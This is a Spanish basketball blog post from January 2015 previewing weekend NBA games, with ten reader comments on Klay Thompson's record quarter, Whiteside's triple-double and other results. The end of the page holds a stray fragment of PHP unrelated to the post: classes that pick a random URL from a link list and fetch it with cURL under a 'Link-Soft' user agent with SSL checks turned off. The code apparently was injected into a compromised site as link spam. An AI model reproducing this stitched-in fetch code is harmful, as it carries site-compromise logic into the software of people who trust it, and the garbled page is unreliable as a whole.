Fin de semana: Maldito hombro…

23 de January de 2015 por TheDeerHunter

… maldito pulgar y maldita muñeca. Cada año la temporada baloncestística termina marcada por las fatídicas lesiones que nos privan de algunos de los mejores jugadores de la liga, alterando además el curso normal de la competición. Todos temblamos ante la perspectiva de la retirada de Kobe y de que su último partido disputado pueda haber sido en esta triste campaña. Por su parte los aficionados Blazers miran con vértigo hacia abajo en la clasificación. 9 victorias de ventaja no parecen tantas en estos momentos.

Los Blazers sólo saldrán a la palestra el sábado, en un complicado test ante los Wizards aunque arropados por su público. Los Lakers en pura depresión se enfrentan, nada menos, a los campeones hoy en el “Álamo”, para recibir el domingo a los Rockets. Viacrucis.

En la jornada del viernes disfrutaremos de una dura prueba de fuego para los pujantes Thunder. Los Hawks de las 14 seguidas, me temo, y en el Philips Arena. Con el rabillo del ojo estarán pendientes de lo que pase en el Rockets@Suns confiando en que su excompañero Harden impida que se pongan las cosas aún más complicadas.
Los Cavs se enfrentan a los Hornets en el mejor momento de ambos. Bulls tratarán de administrar su ventaja en Dallas y los Raptors lo tendrán más fácil en Philadelphia.
El resto de viernes, con al menos de interés, lo completan Pacers@Heat, Magic@Knicks, Pelicans@Wolves, Celtics@Nuggets y Kings@Warriors.

El sábado, además del mentado partido de Portland, podremos ver cómo los Grizzlies se ceban con los Sixers. La velada es algo gris con Knicks@Hornets, Pistons@Bucks y Nets@Jazz.

El domingo, sin embargo, espectáculo puro y en horarios muy asequibles. Heat@Bulls a las 20h y un Durant vs LeBron a las 21:30h. Les siguen un Clippers@Suns y un Mavs@Pelicans para no parar. Además Wolves@Hawks, Pacers@Magic, Bucks@Spurs, Pistons@Raptors, Celtics@Warriors, Wizards@Nuggets y el mencionado Rockets@Lakers.

A disfrutarlo señores.

Comenta

10 comentarios a esta entrada

  1. Blade Petrovic dice:
    #1

    Pero hoy lo que dara que hablar, es el 3 cuarto que se mando Klay Thompson, Madre mia , estaba en modo bestia/dios metio 37 de los 41 puntos de su equipo en ese cuarto. 9/9 en triples, Klay ya no es solo un jugador 2k, debe ir al All Star!

      Citar

  2. Nacho dice:
    #2

    Pues acabo de ver el cuarto de marras del tal Thompson.
    Na, solamente ha metido nueve triples (de nueve intentos, eso sí), tres canastitas de dos (sin fallos, pero una era para abajo), dos tiros libres, y ya está. Pero solo ha dado una asistencia en el cuarto. La otra canasta de su equipo fue sin su participación. Osea, que no se ponga muchas medallas. Y es que ahora va a ser que eso que ha hecho es la leche. total, los Kings se pusieron por delante en el marcador, pero eso carece de importancia. Al final del cuarto iban 24 abajo, pero no porque Klay las metiese, si no porque ellos fallaban. Una tontá, vamos.
    Pero es que el cabrón las metía de todos los colores. Me quedo, creo que es el tercer triple, con una jugado en la que le pide a Green el bloqueo y en el mismo segundo parece que dice, “espera que este tío (el defensa) se ha ido 5 cm. para atrás y me la casco desde aquí. Brutal.
    Iba a comentar las dos victorias seguidas de de los Bulls, con sendos partidos serios, parece que un cambio en la dirección de Thibbo (aunque hay cosas que aún me chirrían) y el partidazo ¿cuántos van? de los Hawks ante OKC (que larga se les va a hacer la temporada e igual no llegan), pero lo del chaval lo eclipsa todo.

      Citar

  3. Nacho dice:
    #3

    Por cierto, más increíble que lo de Thompson, y de lo que sí deberán hablar los libros de historia, es de la tercera victoria seguida de los Knicks.

      Citar

  4. Ruxixón dice:
    #4

    15 seguidas de Hawks en su particular “sólo otro día en la oficina”.No aprovechan los Thunder la derrota de Phoenix ante Houston y siguen a 3 partidos de PO.Yo me froto las manos ya de cara al domingo a ver lo que depara de sí ese choque Cleveland – Oklahoma.Por cierto que otra paliza de los Cavs,ésta ante Charlotte,que frena así su racha ascendente.No sé quién se colará en PO pero Miami,Brooklyn o Charlotte parecen un chollazo en primera ronda.Si llega Detroit,que deseo que si,ya no tanto.

    Vaya chollo debe ser Klay Thompson en la hoops,madre,”jodio” del que lo tenga xD

      Citar

  5. Triceratops dice:
    #5

    Estaba viendo diferido el NYK- Orlando y es de chiste que los Magic se harten de draftear jugadores defensivos y que luego lleguen Carmelo y 4 amigos y te metan 113 puntos, mayor anotación en lo que va de temporada en los Knicks. Pero más deprimente es, el final, tras un último cuarto igualadisimo con ambos equipos alternandose en el marcador, en los 3 últimos minutos en los que Melo no hace nada y Calderón ya estaba lesionado, entre 2 tios desconocidos de contrato temporal de 10 días como Lance Thomas y el tal Galloway te metan 6 y 8 puntos respectivamente y que entre los dos se combinen para acabar el partido con 31 puntos 12 rebotes, 7 asistencias y 13/20 en TC. Vergonzoso para los Magic.
    Cuanto de frustrante debe ser que veas que se acerca el All-Star, y no vayas porque juegas en un equipo que es una castaña. Ese pensamiento debe rondar por la mente de Vucevic. 24 puntos, 12 rebotes, 2 asistencias y 56% en TC en los últimos 10 partidos.
    Creo recordar que en la porra puse en el MIP a Hardaway, pffff vaya castaña. No es mal jugador, me parece un revulsivo válido y un digno suplente, pero no más.

    En el Mavs-Bulls (a día de hoy, los veo como los que van a llegar a la final), que importante victoria de los de Illinois.
    Tuvo mucha suerte Rose, con 100-98 para Bulls faltando 6 segundos para el final y 3 para la posesión de Chicago, selecciona un mal tiro forzando mucho la jugada ante 3 tios en vez de pasar atrás a Pau que podría haber lanzado un tiro completamente solo de 5 metros. Pero después de tirarse el ladrillo, tuvo suerte para recoger su propio rebote y posteriormente agotar la posesión.
    Salió Snell de titular y lo hizo francamente bien. Siempre ha sido un jugador al que le he visto cosas como para merecer más minutos, aunque este año tenía estaba teniendo menos protagonismo que en su año rookie. Sería importante que Thibs le diera más confianza y contar con él más a menudo en la rotación y de paso darle más descanso a Butler.

      Citar

  6. jhc dice:
    #6

    señores triple doble de whiteside con 11 tapones!!!

      Citar

  7. Nacho dice:
    #7

    En el momento down de estos Bulls esquizos (back to back viernes-sábado con victorias ante Spurs y Mav´s con buenas sensaciones), llega Miami Heat de rebajas y Whiteside saca el zurrón de los tapones y deja 12 regalitos. Que junto con 13 rebotes y 14 puntos marcan el triple-doble del año.
    Dos palabras: Im-presionante.

      Citar

  8. Triceratops dice:
    #8

    ¿Alguien puede decirle a Ibaka que deje de tirar triples?

      Citar

  9. Nacho dice:
    #9

    Triceratops:
    ¿Alguien puede decirle a Ibaka que deje de tirar triples?

    Pues eso he pensado yo muchas veces viendo alguna de sus mandarinas, pero el muchacho solo tiene a 19 tíos con mejor porcentaje de 3 en toda la liga. Está por encima del 40%

      Citar

  10. Nacho dice:
    #10

    Y Jennings se pierde la temporada.
    Jugador y franquicia enderezan el rumbo y ahora… penilla da (aunque según su contrato, ¿es una lesión para compadecernos o para que se joda?, es que eso no lo llevo muy al día, jejeje)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>